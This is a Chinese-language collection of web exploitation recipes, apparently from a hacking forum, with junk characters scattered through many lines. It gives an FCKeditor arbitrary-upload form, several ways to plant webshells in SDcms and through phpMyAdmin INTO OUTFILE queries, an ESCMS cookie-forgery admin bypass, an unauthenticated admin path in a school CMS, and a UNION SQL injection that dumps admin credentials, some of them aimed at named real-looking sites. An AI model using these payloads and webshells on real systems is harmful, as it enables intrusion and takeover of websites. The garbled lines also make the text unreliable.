如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件. t9 Y3 W4 `1 r
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">) R* j+ S6 z, d3 K
Upload a new file:<br>
4 E% U* _0 ?8 y& E: q( K<input type="file" name="NewFile" size="50"><br>. r( z% x7 o. |) [& `
<input id="btnUpload" type="submit" value="Upload">
0 r9 f) u) \) E0 C! m</form>' e0 x8 H) R; K7 [! D9 `* }
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------* J' S/ J* Z# \4 K! Q
9 u- J. l/ s1 I0 b& tSDcms 后台拿webshell7 \2 e, ^/ o3 W. N" u
9 U! J3 u, S+ ?; A1 O* e& Q第一种方法:( S* Y: _5 D$ B0 @
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
4 d! u9 F# n8 M把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
0 k# r9 D8 C+ V' Y用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
# y' v7 g. r( S* v第二种方法:
: }: A6 r( L: q- o: A7 x进入后台-->系统管理-->系统设置-->系统设置->上传设置;
6 X# \! L* z: O" @; l在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
, p$ ~# O2 Q" j* G) Y4 F7 |第三种方法:% @: E5 i) ^. W) b, h; G C
进入后台-->界面管理-->模板文件管理-->创建文件
6 h; y" P+ @: g文件名写入getshell.ashx. H9 K! V2 d$ [: @6 o
内容写入下面内容:5 P+ Y4 M0 F" k6 t
/====================复制下面的=========================/
0 L4 ` t( ~% M/ N0 y2 x- x4 ^<%@ WebHandler Language="C#" Class="Handler" %>" b* W1 K1 L0 q' s: J
using System;
; @8 Q- o! h$ ] i% m. b) Q4 a! \using System.Web;
/ c4 v. E; u7 }: z1 q2 @using System.IO;
8 c' u# n2 ]( h+ tpublic class Handler : IHttpHandler {
6 Q5 f: c7 t( F) o. N, Fpublic void ProcessRequest (HttpContext context) {, r) y! t1 ^1 R: n* ~; F
context.Response.ContentType = "text/plain";
) f0 X/ H& o) G% C1 _! W& kStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
F0 B" a( D& J4 H( r% qfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
' [2 ]* a4 `; z6 Rfile1.Flush();9 l7 } D6 \/ b% Y7 ^( }6 L* q
file1.Close();
6 l7 w. X+ y# ~, u* f. U; s} k& X/ O/ v$ L; M0 E* w
public bool IsReusable {
# h' }7 K9 k" ]# Q* O H' q5 Xget {
- |! a* {1 o7 n, B7 H. g0 zreturn false;
& V1 j7 g7 z; {* q5 h}2 C, [" x+ v$ U- l- w8 z
}
, K b3 {$ |+ K; u}. n2 a- n5 D" x2 [# a
/=============================================/% k# G5 w' \2 ^5 I: w, a
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx1 m/ O( p$ \2 ^: W6 s
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
; U4 K" b/ i4 B/ z8 n; n8 k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! t2 A5 d& v4 s$ I! `0 H4 M8 _3 q6 }4 }. |- a
ESCMS网站管理系统0day" F% u; U5 M( ?1 T' n2 v6 H5 B/ z3 q9 I
2 q6 ^$ L m/ N. X
后台登陆验证是通过admin/check.asp实现的
8 D& i% j4 F( [
" y, k9 R% B& N9 l首先我们打开http://target.com/admin/es_index.html' N& U" ~% s( c& d
然后在COOKIE结尾加上: m2 P% p) j3 P2 k3 c0 a! ?2 }
; ESCMS$_SP2=ES_admin=st0p;
% U; X( a( ?" ?: W修改,然后刷新" p- @. D) C; [3 O; @
进后台了嘎..
* c0 _8 B" w' v) s. i+ o: Y( ]) ?. [* T然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL! `1 I# E6 T# Z
: b9 X! }/ U6 s" H4 }利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
- j0 \1 k( ~1 a7 D! v: P9 p. a嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
) k- b% r% C2 w, z3 Q( G* S存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..; A8 K, I6 v; I9 X9 H
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
! b! B! u7 b& [) @0 p6 [6 Y------------------------------------------------------------------------------------------------------------------------------------------------------------------------------' Y) e5 o3 }9 E9 X0 t, y! f
3 x& F5 |6 o! H% [5 ?' ]# A
宁志网站管理系统后台无验证漏洞及修复: E; z# H2 ^6 G2 F/ z% I; G" M4 _1 N
& x$ \8 f+ h/ ]) }$ @3 h网上搜了一下,好像没有发布.如有雷同纯粹巧合!" Y: q* [# s5 p; @8 `; K7 \' C. Q
官方网站:www.ningzhi.net
: t9 Y/ z- O8 \4 a# J% G0 f学校网站管理系统 V.2011版本 4 X- ]' f6 ~/ e( p) w7 E7 q
http://down.chinaz.com/soft/29943.htm
0 I, Z0 n P# J$ X! d, d3 X. K其它版本(如:政府版等),自行下载.
# K& b/ F7 `% |$ W i漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~1 a2 K9 ]: \0 M P8 Q
login.asp代码如下:. ]6 d6 K" X% h6 P3 Y; M: v
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
3 l J; ]& h3 ^6 ]# q* Y: ^; m2 ~5 \manage.asp代码我就不帖出来了.反正也没验证.
C% a2 `1 z- Q; c只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!/ T& d }0 f% V! X
漏洞利用:
0 q" g5 S; r7 H! j直接访问http://www.0855.tv/admin/manage.asp d5 W. i# P% K0 N; K( O
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
9 {9 u1 E' u4 T* t2 z----------------------------------------------------------------------------------------------------------------------------------------------------------------------------( d1 c R: ^2 R6 @4 a7 t
. B$ u8 }. E1 i; K: n2 }! a" ]phpmyadmin拿shell的四种方法总结及修复/ @1 G8 r' f% `: r" l
3 `8 ?3 m! F3 ?& [5 p# C方法一:0 O. ^/ Q! H" t5 m' a+ j
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );. `( f' K; Y( P6 X0 E$ }, {
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');! {( n' H) M6 Q- i$ g6 n! R) B
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
+ U& | Y/ A1 C0 ?$ ^6 ]! b9 m----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php8 y w9 Y! U, U: I( b6 G. p7 w
一句话连接密码:7on
! V. m6 `, b3 P; ?! X方法二:
. C6 H4 m3 M! a; p" T5 k读取文件内容: select load_file('E:/xamp/www/s.php');9 R+ a- T% d3 _. Z1 q# D
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
- X. {* r1 Q0 o* e* ?, @+ z* W' g% Mcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
, w& E$ o! P4 H3 O8 R# A( }+ N方法三:
; D& p$ e- d$ C3 j8 u; |JhackJ版本 PHPmyadmin拿shell
# m8 {( s, w% N" tCreate TABLE study (cmd text NOT NULL);
) O- B+ A0 ~4 X6 g* gInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
. r# F i& Q1 Q8 Pselect cmd from study into outfile 'E:/wamp/www/7.php';, R1 B1 u/ H" X" s( \8 x: I1 a0 B
Drop TABLE IF EXISTS study;* G! z% Q' M/ u G
<?php eval($_POST[cmd])?>
. z ]* P# T5 cCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
' q! L2 h, s F5 d! z2 x: ^1 tINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
% h- e. Z9 N8 A6 oSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 14 _5 V8 @3 J5 W% Q _
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。: H' z/ `- V( Q/ v% |5 z M! Z
方法四:
2 ^$ r& Q) C2 {5 t4 ?, qselect load_file('E:/xamp/www/study.php');
: O" M0 w) Y! F8 y5 Wselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
1 a2 }, c( Y* c9 P然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
' N: h0 Q, e9 P4 ?-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
_, t% d; r4 o6 n4 w
% p7 \! E* W* g" ~1 L/ mNO.001中学网站管理系统 Build 110628 注入漏洞
" K7 A0 E; u1 c, v9 F; U9 A
2 F5 M0 K: L, r P. aNO.001中学网站管理系统功能模块:/ ^. t! f- ^# N9 j! e
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等 J8 |: O: f9 w' X& u' O. d
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
1 o" ]; S. B+ G& h3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
6 C9 W0 G3 M4 {- s7 v" i, H9 ]4.视频图片管理:一级分类,动态添加视频或者图片等信息% d) `- t1 C# |2 t
5.留言管理:对留言,修改,删除、回复等管理4 ~# [4 G% N" ]/ B6 @
6.校友频道:包括校友资料excel导出、管理等功能
6 e# Y+ v- b2 s7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
) ^- y, t( b' \7 M( q' }; d默认后台:admin/login.asp
3 N7 x4 [/ n; j+ s; x官方演示:http://demo.001cms.net! o9 `7 f' h* D! ~% E# Z
源码下载地址:http://down.chinaz.com/soft/30187.htm
6 T: M7 D P; n! i- uEXP:- ?; A0 g7 \8 [; q' T5 a. H
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
2 k! b! c: T3 v, l- P测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin5 ~' Y, o4 b& A
getshell:后台有备份,你懂的
+ i/ C* c+ ]% X* I7 m另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
9 W2 O2 F2 n: c, v% V$ e------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |